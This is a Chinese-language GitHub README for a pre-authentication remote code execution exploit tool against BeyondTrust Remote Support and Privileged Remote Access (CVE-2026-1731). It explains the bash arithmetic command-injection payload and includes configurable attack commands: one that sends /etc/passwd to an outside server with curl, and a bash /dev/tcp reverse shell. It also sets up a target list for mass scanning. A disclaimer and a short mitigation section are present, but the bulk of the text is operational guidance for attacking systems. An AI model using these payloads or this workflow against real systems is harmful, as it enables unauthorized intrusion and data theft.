LutfifakeeXone/CVE-2026-1731

GitHub: LutfifakeeXone/CVE-2026-1731

针对 BeyondTrust RS/PRA 产品的 CVE-2026-1731 命令注入漏洞的预认证 RCE 利用工具。

Stars: 0 | Forks: 0

# 🚨 CVE-2026-1731 — BeyondTrust Pre-Auth RCE 漏洞利用 ## 📖 概述 **CVE-2026-1731** 是一个 **严重的命令注入漏洞**,允许在 BeyondTrust 产品中进行 **未经身份验证的远程代码执行 (RCE)**。 ### 🎯 受影响产品 | 产品 | 受影响版本 | |--------|--------------------| | **BeyondTrust Remote Support (RS)** | ≤ 25.3.1 | | **BeyondTrust Privileged Remote Access (PRA)** | ≤ 24.3.4 | ## 🧠 技术细节 该漏洞存在于以下脚本中: ``` thin-scc-wrapper ``` 该脚本对攻击者控制的输入 (`remoteVersion`) 执行 Bash 算术评估。 问题在于: - Bash 将操作数视为 **表达式**,而非普通字符串 - 这允许注入如下 payload: ``` a[$(command)]0 ``` ➡️ 此 payload 会导致 **任意命令执行** ## ⚙️ 环境要求 请确保您的环境已正确配置: ### 📦 安装依赖 ``` pip3 install requests ``` ### 🔌 安装 WebSocket Client ``` wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl chmod +x websocat sudo mv websocat /usr/local/bin/ ``` ## 📂 目标列表 创建一个名为 `domains.txt` 的文件: ``` target1.example.com target2.example.com 192.168.1.100 ``` ## 🚀 使用方法 ### 1. 配置 Payload 编辑 `exploit.py`: #### 🔍 Blind RCE (测试) ``` CMD = "nslookup your-domain.burpcollaborator.net" ``` #### 📤 数据窃取 ``` CMD = "curl -X POST -d @/etc/passwd http://your-server.com/" ``` #### 🐚 Reverse Shell ``` CMD = "bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1" ``` ### 2. 运行 Exploit ``` python3 exploit.py ``` ## 🖥️ 示例输出 ``` == Checking target1.example.com == Company: PT-12345 Running WebSocket action... [target1.example.com] WebSocket output: Connection established Command executed successfully ``` ## 🔎 详细模式 在 `exploit.py` 中启用 debug 模式: ``` VERBOSE = True ``` ➡️ 这将显示: - 目标 URL - 已发送的 payload - 详细响应 ## ⚠️ 重要提示 - 此脚本仅在以下情况下才能正常运行: - 目标存在漏洞 - `websocat` 已安装且可用 - 如果您遇到: **错误:`websocat not found`** - 请确保 `websocat` 位于: - 与脚本相同的目录中,**或者** - `/usr/local/bin/` **错误:`ModuleNotFoundError`** - 安装所需的 Python 模块: pip3 install requests ## 📁 项目结构 ``` CVE-2026-1731/ ├── exploit.py # Main exploit script ├── domains.txt # Target list ├── websocat # WebSocket client ├── README.md # Documentation └── DISCLAIMER.md # Legal disclaimer ``` ## 🛡️ 缓解措施 立即更新到最新的修补版本: - BeyondTrust Security Advisory:**BT26-02** 附加建议: - 限制服务的网络访问 - 使用 WAF / IDS 保护 - 监控可疑活动 ## 📚 参考资料 - Rapid7 Analysis (Attackerkb) - NVD (National Vulnerability Database) - BeyondTrust Security Center ## ⚖️ 许可证 MIT License ## 🚫 法律免责声明 此工具仅可用于: - **实验室环境、测试或研究** - 拥有 **明确的书面授权** 未经授权的使用可能违反: - 当地网络犯罪法律 - 国际网络安全法规 ## ⭐ 备注 如果您觉得此仓库有用: - ⭐ Star 此仓库 - 🔥 负责任地使用 - 🧠 保持道德,遵守法律
标签:Bash算术评估, BeyondTrust, CISA项目, CVE-2026-1731, PoC, Python, WebSocket, 企业安全, 依赖分析, 关键漏洞, 利用脚本, 协议分析, 命令注入, 安全漏洞, 应用安全, 数据展示, 数据窃取, 无后门, 暴力破解, 权限提升, 特权远程访问, 红队, 编程工具, 网络安全, 网络资产管理, 远程代码执行, 远程控制, 远程支持, 远程访问, 逆向Shell, 隐私保护, 预认证RCE